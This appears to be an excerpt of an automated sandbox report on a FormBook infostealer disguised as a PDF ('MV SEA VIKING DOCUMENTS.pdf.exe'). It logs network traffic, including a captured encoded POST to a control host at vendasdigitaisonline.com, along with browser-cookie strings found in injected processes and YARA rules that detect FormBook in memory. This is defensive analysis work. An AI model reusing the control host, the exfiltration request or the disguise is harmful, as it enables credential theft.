      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:55:54 GMTContent-Type: text/htmlContent-Length: 275ETag: "620175f4-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:56:05 GMTContent-Type: text/htmlContent-Length: 275ETag: "61fc6928-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Mon, 21 Feb 2022 15:56:57 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:57:07 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 21 Feb 2022 15:57:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 215X-Sorting-Hat-ShopId: 59546730662X-Dc: gcp-europe-west1X-Request-ID: e8a9a7ce-56d1-4369-a2f3-2ed7528383daX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6e112b9c8aa56961-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:57:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "61fc68f2-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:57:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "620175f5-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: chkdsk.exe, 00000015.00000002.7218459494.0000000005F56000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7219660472.000000000662C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000003.4843229229.0000000004D26000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000000.4625167186.000000002302C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: chkdsk.exe, 00000015.00000002.7218459494.0000000005F56000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7219660472.000000000662C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000003.4843229229.0000000004D26000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000000.4625167186.000000002302C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
      Source: unknownHTTP traffic detected: POST /be4o/ HTTP/1.1Host: www.vendasdigitaisonline.comConnection: closeContent-Length: 174831Cache-Control: no-cacheOrigin: http://www.vendasdigitaisonline.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vendasdigitaisonline.com/be4o/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 34 38 48 6c 3d 30 65 7e 4a 38 43 75 59 35 56 63 4d 58 32 7e 59 45 78 4c 61 78 52 53 74 71 37 57 56 6f 6b 4a 35 52 67 42 77 32 61 47 50 6e 47 31 35 54 39 28 2d 35 6f 44 69 62 7a 35 75 35 6c 33 35 6b 30 28 48 37 52 44 74 54 76 6a 36 71 38 76 44 4c 73 63 36 42 36 47 31 6c 36 59 67 37 6d 4e 70 33 73 71 39 69 63 35 42 6b 2d 6a 36 4e 42 62 4d 77 62 52 69 79 4a 4b 38 32 53 4f 52 74 75 45 75 61 70 28 72 68 68 7e 56 57 4c 4e 33 54 76 78 51 41 61 31 79 6e 30 32 58 48 7a 73 58 6e 38 66 68 53 77 54 70 6c 4f 64 44 6e 7a 39 30 72 4b 50 6c 69 32 37 58 44 57 45 72 78 63 6d 79 28 5a 69 34 62 4d 65 49 78 7a 6c 4d 6d 61 73 45 32 4a 6b 37 77 52 4f 4d 39 67 56 58 4b 47 67 32 72 6a 6b 46 45 50 6d 53 62 45 74 7a 42 47 65 41 76 52 50 5a 37 46 79 44 4d 63 4d 31 78 2d 69 48 58 66 46 66 59 32 4f 4c 75 71 44 53 38 65 63 6d 69 7a 70 6a 39 78 51 50 31 4b 45 5a 35 58 49 46 6d 78 4d 68 4b 64 67 39 74 59 52 34 79 4c 36 7a 52 2d 63 65 63 78 4f 46 4e 77 53 46 52 73 62 56 4f 56 44 5f 38 57 59 51 66 76 78 31 78 51 43 64 79 76 32 64 45 7a 57 67 31 39 32 6f 39 36 6f 69 39 55 7e 61 7a 73 34 76 53 36 35 69 4a 33 48 6a 68 6d 69 63 63 78 62 55 30 31 64 7a 75 43 48 74 4b 35 6b 58 58 62 75 55 4c 42 30 74 7a 4b 6f 61 48 46 79 6d 49 31 49 70 4c 39 65 57 34 4d 50 45 4e 41 67 4c 36 32 70 78 7a 54 45 72 47 39 39 50 38 44 65 5f 74 51 62 76 4e 53 7a 36 58 6c 67 30 31 70 6d 46 71 7a 53 73 37 51 37 63 65 36 33 65 47 65 68 57 46 6c 75 6e 7a 58 4a 46 35 2d 77 5f 55 67 56 33 5a 4d 41 35 46 53 78 42 63 53 41 70 38 32 64 6a 6d 52 4c 65 68 67 56 31 50 59 6a 39 6e 53 4a 35 61 5a 6a 7a 41 6e 4f 46 62 6d 4b 58 36 63 47 30 48 52 62 4c 54 73 46 66 47 72 6a 65 41 5f 54 6b 41 77 44 6c 6f 42 30 6a 68 67 53 52 46 59 33 52 28 6f 78 2d 48 76 65 71 4d 6e 72 5f 61 52 36 47 79 52 43 41 76 71 79 7a 79 71 77 55 65 73 63 39 54 50 4b 49 7e 4c 30 39 61 53 73 4a 5a 61 36 46 41 34 59 72 34 33 5a 35 34 37 71 43 66 49 58 5a 4e 5a 4f 41 6b 58 76 4b 64 76 56 74 59 6a 4f 74 52 6d 54 71 59 5f 79 34 35 78 6c 5f 61 44 39 31 56 6a 36 79 52 44 48 31 4a 61 4e 37 70 67 6c 72 51 6c 4d 51 63 6b 4c 79 4d 34 6d 46 72 37 33 75 67 37 55 6c 66 55 43 77 78 70 6a 73 73 4e 4c 58 53 54 57 5a 28 48 7e 2d 39 4b 79 62 44 62 4a 33 61 31 49 4e 47 77 67 5a 75 61 59 43 39 45 56 47 4f 55 37 37 61 41 69 53 44 50 71 4e 6e 46 64 49 66 35 42 46 59 34 63 68 4a 31 66 4d 50 37 49 79 6b 41 47 34 7e 4e 52 43 65 77 70 42 6d 53 65 6e 32 46 64 43 53 4a 77 66 28 77 44 43 46 46 78 65 42 45 31 4a 70 5f 48 6a 67 4e 63 48 78 47 7e 42 4d 4b 64 47 41 65 34 61 74 64 6c 43 54 4f 77 6f 31 55 73 5a 6e 38 35 31 65 47 44 43 50 52 62 43 71 59 54 75
      Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
